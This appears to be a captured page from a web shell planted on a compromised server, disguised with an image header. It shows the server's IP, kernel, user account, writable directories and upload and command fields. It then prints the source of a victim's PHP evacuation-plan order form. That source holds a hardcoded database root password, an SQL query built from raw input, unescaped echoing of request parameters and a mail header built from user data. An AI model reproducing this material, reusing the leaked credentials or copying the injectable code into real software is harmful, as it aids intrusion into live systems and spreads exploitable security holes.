????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.107
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/api/notes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/api/notes/utrym.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Namnl&Atilde;&para;st dokument</title>
<style type="text/css">
.text {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 24px;
	color: #666;
	alignment-baseline:middle;
}
.text2 {
	font-family: Verdana, Geneva, sans-serif;
}
.text2 {
	font-size: 16px;
}
</style>

<?php

if($_GET['sent'] == "true"){
	$file = "http://www.notes-online.se/login/download_export_file.php?file=/".$_POST['filename']."/".$_POST['filename'].".pdf&companyId=".$_POST['companyid'];
		$body = "Dear Sir, <br><br> I hereby order: <br><br>Object: ".$_POST['object']."<br>Floor name: ".$_POST['floor']."<br>Reassembly SWE: ".$_POST['swe']."<br>Reassembly ENG: ".$_POST['eng']."<br>Alarm number: ".$_POST['alarm']."<br>Situation plan: ".$_POST['address']."<br>Comments: ".$_POST['comments']."<br><br>Filename: ".$file."<br>";
		
		
		
		$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("notes");

	$sql = "SELECT * FROM  tblUsers WHERE  userId =".$_POST['userid'];

$result = mysql_query($sql);
while ($row = mysql_fetch_assoc($result)){ 
	$username = $row['username'];
}
		
	
		
		
		
				$headers  = 'MIME-Version: 1.0' . "\r\n";
				$headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 
				$headers .= "From: ".$username."\r\n";
				mail("utrymningsplaner@astacus.se", "New Order: ".$_POST['object'], $body, $headers);
				
echo("<script>alert('Thank you, your order was recieved!');</script>");
}

?>

</head>

<body>

<p>&nbsp;</p>
<p>&nbsp;</p>
<center>
<p><strong class="text">Order form - Evacuationplan</strong></p>
<form id="form1" name="form1" method="post" action="utrym.php?sent=true">
  <table width="700" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td width="297"><span class="text2">Object:</span></td>
      <td width="403" align="right"><span class="text2">
        <input name="object" type="text" class="text2" id="object" size="40" placeholder="Ex: Firetown Elementary School"/>
      </span></td>
    </tr>
    <tr>
      <td><span class="text2">Floor name:</span></td>
      <td align="right"><span class="text2">
        <input name="floor" type="text" class="text2" id="floor" size="40" placeholder="Ex: Plan 1"/>
      </span></td>
    </tr>
    <tr>
      <td><span class="text2">Reassembly location:</span></td>
      <td align="right"><span class="text2">SWE:
        <input name="swe" type="text" class="text2" id="swe" size="13" placeholder="Ex: Parkering"/>
        ENG:
        <input name="eng" type="text" class="text2" id="eng" size="13" placeholder="Ex: Parking lot"/>
      </span></td>
    </tr>
    <tr>
      <td><span class="text2">Alarm number:</span></td>
      <td align="right"><span class="text2">
        <input name="alarm" type="text" class="text2" id="alarm" value="112" size="40" />
      </span></td>
    </tr>
    <tr>
      <td><span class="text2">Situation plan (Full address): </span></td>
      <td align="right"><span class="text2">
        <input name="address" type="text" class="text2" id="address" size="40" placeholder="Ex: Evacstreet 911, Firetown" />
      </span></td>
    </tr>
    <tr>
      <td class="text2">Comments:</td>
      <td align="right"><span class="text2">
        <input name="comments" type="text" class="text2" id="comments" size="40" />
      </span></td>
    </tr>
    <tr>
      <td class="text2"><input type="hidden" name="companyid" id="companyid" value="<?php echo($_GET['companyid']);?>" />
        <input type="hidden" name="userid" id="userid" value="<?php echo($_GET['userid']);?>"/>
        <input type="hidden" name="filename" id="filename" value="<?php echo($_GET['path']);?>"/>
        <input type="hidden" name="application" id="application" value="<?php echo($_GET['application']);?>"/></td>
      <td align="right"><br />
        <br />
        <input type="submit" name="Order!" id="Order!" value="Order" /></td>
    </tr>
  </table>
</form>
<p class="text2">
  <?php
$companyid = $_GET['companyid'];
$userid = $_GET['userid'];
$filename = $_GET['path'];
$application = $_GET['application'];
echo("<br>companyid: ".$companyid);
echo("<br>userid: ".$userid);
echo("<br>filename: ".$filename);
echo("<br>application: ".$application);

?>
</p>
<p class="text2">&nbsp;</p>
</center>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit